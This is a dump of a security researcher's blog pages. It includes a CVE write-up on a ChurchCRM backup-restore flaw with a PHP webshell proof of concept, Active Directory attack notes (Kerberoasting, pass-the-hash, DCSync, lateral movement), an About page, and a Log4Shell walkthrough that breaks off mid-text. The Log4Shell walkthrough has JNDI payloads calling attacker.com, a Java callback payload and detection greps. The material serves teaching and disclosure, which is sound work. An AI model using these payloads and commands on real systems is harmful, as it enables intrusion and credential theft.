[{"content":" ⚠️ Disclaimer: This article is for educational purposes only. Test only on systems you are authorized to test.\nAffected Systems Impact Vulnerability Type ChurchCRM Critical 9.1 Remote Code Execution Introduction Hello everyone. In this article, I\u0026rsquo;m going to walk you through how I managed to find the CVE-2026-40484 vulnerability from the very first moment all the way to the point where it was officially registered and published in the MITRE database.\nGetting Started To get the highest-level Turkish accreditation, one of the requirements is that I must have at least one CVE registered under my name. So I had to start a journey looking for systems where I could grab a CVE as quickly as possible.\nI headed over to GitHub and started browsing through projects that actually care about security in their development. My eyes landed on a project called ChurchCRM.\nWhen I went through the previously discovered vulnerabilities in the project, I noticed that someone had already reported a Remote Code Execution vulnerability. Here\u0026rsquo;s the link to the vulnerability that was discovered before I even started my own research on this project:\nhttps://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77\nIt was reported on December 17, 2025.\nThere\u0026rsquo;s a key point every security researcher should keep in mind: vulnerabilities that have been patched can actually open the door to discovering new ones. That\u0026rsquo;s why these spots are among the most important places to focus on. Don\u0026rsquo;t fall into the trap of thinking \u0026ldquo;a vulnerability was already found and fixed here, so there\u0026rsquo;s nothing else to look for.\u0026rdquo; That\u0026rsquo;s completely wrong. On the contrary, I\u0026rsquo;d advise you to make it the very first place you look when hunting for bugs.\nBased on that, I started trying to locate this function inside the project and study it for any potential vulnerabilities.\nUsing some filtering commands and browsing through the project\u0026rsquo;s folders and files, I found a backup folder inside it, which contained several files written in PHP.\nAfter analyzing these files and understanding the functions inside them, I successfully reached a vulnerability that leads to Remote Code Execution once again. Let\u0026rsquo;s go through the details of this vulnerability together.\nVulnerability Details ChurchCRM version 7.1.1 contains a critical security vulnerability in the database backup restoration function. When an administrator uploads a backup archive file (.tar.gz) to restore it, the application extracts the archive and copies the contents of the Images/ folder directly into the web-accessible document root, using the function FileSystemUtils::recursiveCopyDirectory().\nThe problem is that this function performs no filtering whatsoever on file extensions during the copy operation. So an attacker who crafts a malicious backup archive in .tar.gz format containing a malicious PHP script inside the Images/ folder can make the application write that file into a publicly accessible path under /Images/Person/ or /Images/Family/. Once written, the attacker can send HTTP requests to the created file to execute arbitrary operating system commands with the privileges of the web server process (www-data).\nTo understand this better, let\u0026rsquo;s dive into analyzing the file where the vulnerability was found.\nVulnerability Location File name: RestoreJob.php Vulnerable line: 138 Helper file: FileSystemUtils.php Vulnerable function: FileSystemUtils::recursiveCopyDirectory() Reading the File Reading RestoreJob.php To understand what it does, let\u0026rsquo;s break it down line by line:\nLine 122: Writes to the log that it has started restoring the backup. Line 123: Opens the backup file (the archive). Line 126: Prepares a temporary folder path with a random name to extract the files into. Line 127: Actually creates the folder on the filesystem. Line 130: Dumps all the contents of the compressed file into this temporary folder. Line 132: Identifies the location of the database file (SQL) inside the extracted files. Line 133: Verifies that the database file actually exists. Line 134: Starts loading the new data file into the system. Line 136: Deletes all the existing old images located at: SystemURLs::getDocumentRoot() . '/Images' Line 138: Takes the images from the temporary folder and sends them to the final location of the site, which is: SystemURLs::getImagesRoot() And here it calls the FileSystemUtils::recursiveCopyDirectory function, which handles copying the folder and everything inside it (files and images) recursively and automatically.\nLine 141: If the data file is not found, it throws an error message stating that the file is missing. So far, everything looks fine. After creating the folder, the code used the following function to handle the copying:\nFileSystemUtils::recursiveCopyDirectory When I tried to locate this function, here\u0026rsquo;s what I found:\nAs you can see, it\u0026rsquo;s located at this path.\nReading FileSystemUtils.php To understand the function, we need to see how it performs the copy operation. Going to line 24, we find the function itself, and we can analyze how it works as follows:\nLine 28: if (file_exists($dst)) Checks whether the destination path already exists on the server, to avoid overlap.\nLine 29: self::recursiveRemoveDirectory($dst); If it\u0026rsquo;s found, it wipes it out completely along with all its contents to prepare the place for the new copy.\nLine 31: if (is_dir($src)) Checks the source path; is it a folder? (If yes, it starts processing its contents).\nLine 32: mkdir($dst); Creates a new folder at the destination with the same name as the source folder.\nLine 33: $files = scandir($src); Opens the folder and reads the names of all files and directories inside it.\nLine 34: foreach ($files as $file) Starts a loop to iterate over every item found in the previous step.\nLine 35: if ($file != '.' \u0026amp;\u0026amp; $file != '..') Ignores the technical symbols that represent the current folder and the parent folder, to make sure we don\u0026rsquo;t fall into an infinite loop.\nLine 36: self::recursiveCopyDirectory(\u0026quot;$src/$file\u0026quot;, \u0026quot;$dst/$file\u0026quot;); Recursion: Here the function calls itself to go into subfolders and repeat the same steps on them.\nLine 39: } elseif (file_exists($src)) { If the path is not a folder, it verifies that it\u0026rsquo;s an actually existing file.\nLine 40: copy($src, $dst); Copies the file as-is from the source to the destination.\nSecurity Analysis 1. Blind Copy Operation\nThe function doesn\u0026rsquo;t ask \u0026ldquo;what am I copying?\u0026rdquo;, it just executes the copy command. There\u0026rsquo;s no check whatsoever on the file content (MIME Type), nor is there any verification of whether the file is a real image or a disguised piece of code.\n2. Absence of Extension Checks\nHere lies the real disaster; the function copies any file regardless of its extension. An attacker can stuff the backup file with dangerous files like:\n.php .phtml .phar .php5 Since the function has neither a \u0026ldquo;blacklist\u0026rdquo; nor a \u0026ldquo;whitelist\u0026rdquo; for extensions, it will transfer these files straight into the live folder of the site.\nAs an attacker, the first thing that comes to mind here is that you can upload malicious files with a PHP extension to fully take over the system :)\nExploitation Requirements From our understanding of the functions and how they work, we can now identify the requirements needed to successfully exploit this vulnerability:\n1. The presence of the database file (ChurchCRM-Database.sql)\nReason: As we saw in the previous code (lines 133 and 141), the system specifically checks for the existence of this file. Tactic: If the code doesn\u0026rsquo;t find this file, it will throw an exception, and the restore operation will stop immediately. So the attacker must include an SQL file (even if it\u0026rsquo;s empty or contains random data) to fool the system into continuing execution. 2. Bypassing the Extension Check (PHP Web Shell Injection)\nReason: The recursiveCopyDirectory function is blind; it copies everything. Tactic: The attacker places a shell.php file inside the images folder (/Images) within the compressed archive. Since the function has no blacklist for extensions, the shell will be extracted and placed in the live folder of the site. 3. Reaching the Live Path (Predictable Path)\nReason: The attacker needs to know where their file was placed. Tactic: Since we know the code copies files into SystemURLs::getImagesRoot(), the path is already known to the attacker in advance. And there\u0026rsquo;s one last thing we need to know: how can we actually invoke this function? That\u0026rsquo;s why we need to look inside the APIs for the request that allows us to trigger it.\nAnd from here it becomes clear that using the following path /api/database/restore, we can invoke this function and trigger it successfully.\nImpact Arbitrary operating system command execution with the privileges of the www-data user. Lateral movement within the server environment. A persistent backdoor; the dropped shell file remains even after the application is restarted. A complete compromise of the confidentiality, integrity, and availability of the CRM data. Proof of Concept First, we need to create a compressed file that contains:\nChurchCRM-Database.sql /Images/Person/shell.php We can use the following code to do that:\nmkdir -p evil_backup/Images/Person echo \u0026#34;SQL backup Test\u0026#34; \u0026gt; evil_backup_test/ChurchCRM-Database.sql # Create a PHP backdoor echo \u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; evil_backup_test/Images/Person/shell.php # Compress the file cd evil_backup tar -czf /tmp/evil_restore_test.tar.gz ChurchCRM-Database.sql Images/ File structure:\nChurchCRM-Database.sql Images/ Images/Person/ Images/Person/shell.php ← PHP webshell Second, uploading via the API:\ncurl -s \\ -b \u0026#34;CRM-SESSION=\u0026lt;session_cookie\u0026gt;\u0026#34; \\ \u0026#34;http://localhost/churchcrm/api/database/restore\u0026#34; \\ -X POST \\ -F \u0026#34;restoreFile=@/tmp/evil_restore_test.tar.gz;type=application/gzip\u0026#34; The server\u0026rsquo;s response will be as follows: HTTP 200\n{ \u0026#34;Messages\u0026#34;: [ \u0026#34;As part of the restore, external backups have been disabled...\u0026#34; ] } After that, the malicious file will be uploaded to the following path:\nImages/Person/shell.php And the moment we try to send a request to this location, we\u0026rsquo;ll see that we can execute remote code successfully!\ncurl \u0026#34;http://localhost/churchcrm/Images/Person/shell.php?cmd=id\u0026#34; Output:\nuid=33(www-data) gid=33(www-data) groups=33(www-data) Proof of Concept in Images 1. Creating the compressed file:\n2. Uploading the file and confirming a successful upload:\n3. Executing the id command:\nFixing the Vulnerability To fix the vulnerability, all the details and code have been added in the following commit:\nhttps://github.com/ChurchCRM/CRM/commit/68be1d12bc4cc1429575ae797ef05efe47030d39\nSources Authenticated Remote Code Execution via Unrestricted PHP File Write in Database Restore Function NIST-NVD: CVE-2026-40484 Detail The Hacker Wire: CVE-2026-40484 CVE: CVE-2026-40484 ","permalink":"https://cyberah-blog.pages.dev/en/cve/cve-2026-40484/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eDisclaimer:\u003c/strong\u003e This article is for educational purposes only. Test only on systems you are authorized to test.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAffected Systems\u003c/th\u003e\n \u003cth\u003eImpact\u003c/th\u003e\n \u003cth\u003eVulnerability Type\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003eChurchCRM\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003eCritical 9.1\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eRemote Code Execution\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eHello everyone. In this article, I\u0026rsquo;m going to walk you through how I managed to find the \u003cstrong\u003eCVE-2026-40484\u003c/strong\u003e vulnerability from the very first moment all the way to the point where it was officially registered and published in the \u003cstrong\u003eMITRE\u003c/strong\u003e database.\u003c/p\u003e","title":"How I Found a Remote Code Execution Vulnerability in the Database Restore Function - CVE-2026-40484"},{"content":"Active Directory (AD) is a centralized directory service developed by Microsoft for managing users, computers, and permissions in Windows networks.\nKerberos Authentication Kerberos is the primary authentication protocol in Active Directory. It uses a ticket-based system instead of sending passwords over the network.\nHow Does It Work? Client ──AS-REQ──\u0026gt; KDC Client \u0026lt;─AS-REP── TGT (encrypted with krbtgt key) Client ──TGS-REQ─\u0026gt; KDC Client \u0026lt;─TGS-REP─ TGS (service ticket) Client ──────────\u0026gt; Service (using TGS) # View current tickets klist # Request a service ticket kinit -S cifs/fileserver.corp.local user@CORP.LOCAL Key point: TGT is valid for 10 hours by default. If stolen, it can be used until expiry.\nNTLM Authentication NTLM is an older protocol still used when connecting to machines outside the domain or via direct IP.\nChallenge-Response Flow Client ──NEGOTIATE──\u0026gt; Server Client \u0026lt;─CHALLENGE── nonce (random value) Client ──RESPONSE──\u0026gt; Hash(nonce + password) # Check authentication protocol used Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select-Object -First 5 Key difference: NTLM is weaker than Kerberos — it doesn\u0026rsquo;t support Mutual Authentication.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/what-is-ad/","summary":"\u003cp\u003eActive Directory (AD) is a centralized directory service developed by Microsoft for managing users, computers, and permissions in Windows networks.\u003c/p\u003e\n\u003ch2 id=\"kerberos-authentication\"\u003eKerberos Authentication\u003c/h2\u003e\n\u003cp\u003eKerberos is the primary authentication protocol in Active Directory. It uses a \u003cstrong\u003eticket-based\u003c/strong\u003e system instead of sending passwords over the network.\u003c/p\u003e\n\u003ch3 id=\"how-does-it-work\"\u003eHow Does It Work?\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient ──AS-REQ──\u0026gt; KDC\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient \u0026lt;─AS-REP── TGT (encrypted with krbtgt key)\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient ──TGS-REQ─\u0026gt; KDC\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient \u0026lt;─TGS-REP─ TGS (service ticket)\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eClient ──────────\u0026gt; Service (using TGS)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# View current tickets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eklist\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Request a service ticket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ekinit -S cifs/fileserver.corp.local user@CORP.LOCAL\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eKey point:\u003c/strong\u003e TGT is valid for 10 hours by default. If stolen, it can be used until expiry.\u003c/p\u003e","title":"What is Active Directory?"},{"content":"Most internal penetration tests end with targeting Active Directory. This guide covers the essential attacks.\nKerberos Attacks Kerberoasting Targets Service Principal Names (SPNs) to extract service tickets and crack them offline.\n# Extract service account tickets impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt # Crack offline hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt AS-REP Roasting Targets accounts with Pre-Authentication disabled.\n# Find vulnerable accounts impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt Privilege Escalation in Active Directory Pass-the-Hash # Use NTLM hash to authenticate without the plaintext password impacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2 DCSync — Dump All Hashes # Requires Domain Admin or DCSync rights impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc Warning: Use these tools in authorized test environments only.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/ad-attacks/","summary":"\u003cp\u003eMost internal penetration tests end with targeting Active Directory. This guide covers the essential attacks.\u003c/p\u003e\n\u003ch2 id=\"kerberos-attacks\"\u003eKerberos Attacks\u003c/h2\u003e\n\u003ch3 id=\"kerberoasting\"\u003eKerberoasting\u003c/h3\u003e\n\u003cp\u003eTargets \u003cstrong\u003eService Principal Names (SPNs)\u003c/strong\u003e to extract service tickets and crack them offline.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Extract service account tickets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Crack offline\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehashcat -m \u003cspan class=\"m\"\u003e13100\u003c/span\u003e hashes.txt /usr/share/wordlists/rockyou.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"as-rep-roasting\"\u003eAS-REP Roasting\u003c/h3\u003e\n\u003cp\u003eTargets accounts with \u003cstrong\u003ePre-Authentication disabled\u003c/strong\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Find vulnerable accounts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"privilege-escalation-in-active-directory\"\u003ePrivilege Escalation in Active Directory\u003c/h2\u003e\n\u003ch3 id=\"pass-the-hash\"\u003ePass-the-Hash\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Use NTLM hash to authenticate without the plaintext password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dcsync--dump-all-hashes\"\u003eDCSync — Dump All Hashes\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Requires Domain Admin or DCSync rights\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eWarning:\u003c/strong\u003e Use these tools in authorized test environments only.\u003c/p\u003e","title":"Attack Active Directory"},{"content":"Lateral movement means pivoting from one compromised machine to another inside the network.\nPsExec Classic remote execution tool.\nimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe WMI Exec Quieter alternative to PsExec, less likely to trigger AV.\nimpacket-wmiexec corp.local/admin:pass@10.10.10.2 SMB / Pass-the-Hash # No plaintext password needed — NTLM hash is enough crackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH Note: These tools leave traces in Windows Event Logs (4624, 4648).\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/lateral-movement/","summary":"\u003cp\u003eLateral movement means pivoting from one compromised machine to another inside the network.\u003c/p\u003e\n\u003ch2 id=\"psexec\"\u003ePsExec\u003c/h2\u003e\n\u003cp\u003eClassic remote execution tool.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"wmi-exec\"\u003eWMI Exec\u003c/h2\u003e\n\u003cp\u003eQuieter alternative to PsExec, less likely to trigger AV.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-wmiexec corp.local/admin:pass@10.10.10.2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"smb--pass-the-hash\"\u003eSMB / Pass-the-Hash\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# No plaintext password needed — NTLM hash is enough\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecrackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e These tools leave traces in Windows Event Logs (4624, 4648).\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Lateral Movement in AD Networks"},{"content":"BloodHound analyzes Active Directory relationships and maps the shortest path to Domain Admin.\nCollecting Data # SharpHound — collect from domain ./SharpHound.exe -c All # Python (no execution on target required) bloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All Analyzing Results After uploading ZIP files to BloodHound GUI:\nFind Shortest Path to Domain Admin Look for ACL Abuse paths Check Kerberoastable Users Tip: BloodHound saves hours of manual analysis and reveals non-obvious attack paths.\n","permalink":"https://cyberah-blog.pages.dev/en/notes/active-directory/bloodhound/","summary":"\u003cp\u003eBloodHound analyzes Active Directory relationships and maps the shortest path to Domain Admin.\u003c/p\u003e\n\u003ch2 id=\"collecting-data\"\u003eCollecting Data\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# SharpHound — collect from domain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e./SharpHound.exe -c All\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Python (no execution on target required)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ebloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"analyzing-results\"\u003eAnalyzing Results\u003c/h2\u003e\n\u003cp\u003eAfter uploading ZIP files to BloodHound GUI:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eFind \u003cstrong\u003eShortest Path to Domain Admin\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eLook for \u003cstrong\u003eACL Abuse\u003c/strong\u003e paths\u003c/li\u003e\n\u003cli\u003eCheck \u003cstrong\u003eKerberoastable Users\u003c/strong\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eTip:\u003c/strong\u003e BloodHound saves hours of manual analysis and reveals non-obvious attack paths.\u003c/p\u003e","title":"BloodHound — Mapping Attack Paths"},{"content":"","permalink":"https://cyberah-blog.pages.dev/en/stats/","summary":"","title":"Blog Statistics"},{"content":"","permalink":"https://cyberah-blog.pages.dev/en/hall-of-fame/","summary":"","title":"Hall of Fame"},{"content":" ⚡ Cyberah Ayham Othman — Penetration Tester | Security Researcher | Trainer 5+ CVEs OSCP OSWE 3+ Years Experience About Ayham Othman, known as Cyberah in the cybersecurity community, is a seasoned penetration tester with over three years of hands-on experience executing advanced penetration tests and Red Team operations for local and international organizations.\nHe holds globally recognized certifications including OSCP, OSWE, and eWPTXv2, along with the Turkish Standards Institution cybersecurity certification. He also has a strong vulnerability research record with 5+ published CVEs, including critical Remote Code Execution findings.\nBeyond fieldwork, Ayham is a trainer and speaker — having trained hundreds of students and delivered talks at conferences in Turkey, Yemen, and Syria. He actively creates educational content on YouTube and Instagram.\n🏆 Certifications OSCP Offensive Security Certified Professional OSWE Offensive Security Web Expert eWPTXv2 eLearnSecurity Web Application Penetration Tester eXtreme CRTO Certified Red Team Operator TSE — Sızma Testi Uzmanı Turkish Standards Institution — Penetration Testing Expert 🔴 Published CVEs CVE-2026-40484 RCE — Critical Remote Code Execution CVE-2026-40483 CVE CVE-2026-40485 CVE CVE-2026-40581 CVE CVE-2026-40593 CVE 🚩 CTF Competitions 🇸🇦 BlackHat Saudi Arabia — Final 2025 Saudi Arabia Finalist 🇹🇷 Konya HackMe CTF Konya, Turkey Competitor 🎤 Speaking \u0026 Talks 🇹🇷 Atlas University — Istanbul, Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 Ibtikar Assembly — Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 Ibtikar Assembly — Turkey Applied Hacking — Hands-on Offensive Security 🇹🇷 Gelişim University — Turkey Cyber 101 — Introduction to Cybersecurity 🇹🇷 ENG Pi — Engineering Students, Turkey How to Start in Offensive Security — Q\u0026A Session 🇾🇪 Dev Zone — Yemen Social Engineering — Tactics \u0026 Awareness Sanad — Syria Cyber 101 + What is OSCP \u0026 How to Get It 📚 Publications \u0026 Courses 📖 The Complete Guide to Nmap Technical book in 8 parts — comprehensive coverage of Nmap 🎓 OSCP Prep Full Course 4 parts | 40+ hours of video \u0026 practical labs | ZeroStrike Academy academy.zerostrike.net ↗ 🌐 Contact ayhanbasyildiz@gmail.com YouTube Instagram X (Twitter) LinkedIn GitHub ","permalink":"https://cyberah-blog.pages.dev/en/about/","summary":"\u003cdiv class=\"cv-profile\"\u003e\n \u003cdiv class=\"cv-profile-avatar\"\u003e⚡\u003c/div\u003e\n \u003cdiv class=\"cv-profile-info\"\u003e\n \u003cdiv class=\"cv-profile-name\"\u003eCyberah\u003c/div\u003e\n \u003cdiv class=\"cv-profile-title\"\u003eAyham Othman — Penetration Tester | Security Researcher | Trainer\u003c/div\u003e\n \u003cdiv class=\"cv-profile-tags\"\u003e\n \u003cspan class=\"cv-tag red\"\u003e5+ CVEs\u003c/span\u003e\n \u003cspan class=\"cv-tag\"\u003eOSCP\u003c/span\u003e\n \u003cspan class=\"cv-tag\"\u003eOSWE\u003c/span\u003e\n \u003cspan class=\"cv-tag\"\u003e3+ Years Experience\u003c/span\u003e\n \u003c/div\u003e\n \u003c/div\u003e\n\u003c/div\u003e\n\u003chr\u003e\n\u003ch2 id=\"about\"\u003eAbout\u003c/h2\u003e\n\u003cp\u003eAyham Othman, known as \u003cstrong\u003eCyberah\u003c/strong\u003e in the cybersecurity community, is a seasoned penetration tester with over three years of hands-on experience executing advanced penetration tests and Red Team operations for local and international organizations.\u003c/p\u003e\n\u003cp\u003eHe holds globally recognized certifications including OSCP, OSWE, and eWPTXv2, along with the Turkish Standards Institution cybersecurity certification. He also has a strong vulnerability research record with 5+ published CVEs, including critical Remote Code Execution findings.\u003c/p\u003e","title":"About Me"},{"content":" ⚠️ Disclaimer: This article is for educational purposes only. Only test on systems you have explicit authorization to test.\nOverview Vulnerability Type: Remote Code Execution (RCE) via JNDI Injection Impact: Critical (CVSS 10.0) Affected Systems: Apache Log4j 2.0-beta9 to 2.14.1\nHow the Vulnerability Works Understanding JNDI JNDI (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.\nThe problem: Log4j would interpret user input and fetch external resources:\nUser-Agent: ${jndi:ldap://attacker.com/exploit} When Log4j logged this value, it would:\nSee ${jndi:...} Connect to the attacker\u0026rsquo;s LDAP server Download and execute a malicious Java class! Exploitation (Lab Environment Only) Set Up Vulnerable Lab docker pull ghcr.io/christophetd/log4shell-vulnerable-app docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app LDAP Redirect Server java -cp marshalsec-all.jar \\ marshalsec.jndi.LDAPRefServer \u0026#34;http://attacker-ip:8888/#Exploit\u0026#34; Malicious Java Payload public class Exploit { static { try { Runtime.getRuntime().exec(\u0026#34;curl attacker.com/callback\u0026#34;); } catch (Exception e) { e.printStackTrace(); } } } javac Exploit.java python3 -m http.server 8888 Trigger the Exploit curl -H \u0026#39;X-Api-Version: ${jndi:ldap://attacker.com:1389/exploit}\u0026#39; \\ http://target:8080/ curl -A \u0026#39;${jndi:ldap://attacker.com:1389/exploit}\u0026#39; http://target:8080/ Detection # Search logs for exploitation attempts grep -E \u0026#39;\\$\\{jndi:(ldap|rmi|dns|corba)://\u0026#39; /var/log/app/*.log # Broader regex grep -iE \u0026#39;\\$\\{[^\\}]*j[^\\}]*n[^\\}]*d[^\\}]*i[^\\}]*:\u0026#39; /var/log/*.log Mitigation # Immediate — disable JNDI lookups java -Dlog4j2.formatMsgNoLookups=true -jar application.jar \u0026lt;!-- Permanent — update Log4j dependency --\u0026gt; \u0026lt;dependency\u0026gt; \u0026lt;groupId\u0026gt;org.apache.logging.log4j\u0026lt;/groupId\u0026gt; \u0026lt;artifactId\u0026gt;log4j-core\u0026lt;/artifactId\u0026gt; \u0026lt;version\u0026gt;2.17.1\u0026lt;/version\u0026gt; \u0026lt;/dependency\u0026gt; Key Takeaways Never trust external input in logging contexts JNDI is dangerous in environments accepting user input Maintain an asset inventory to know 